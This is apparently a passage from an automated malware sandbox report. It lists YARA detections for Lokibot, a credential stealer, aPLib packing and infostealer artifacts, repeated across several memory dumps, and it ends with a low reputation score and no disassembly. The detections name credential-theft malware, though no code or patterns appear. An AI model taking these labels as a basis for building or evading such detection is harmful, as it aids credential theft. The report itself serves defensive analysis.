              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:low

              Disassembly

              No disassembly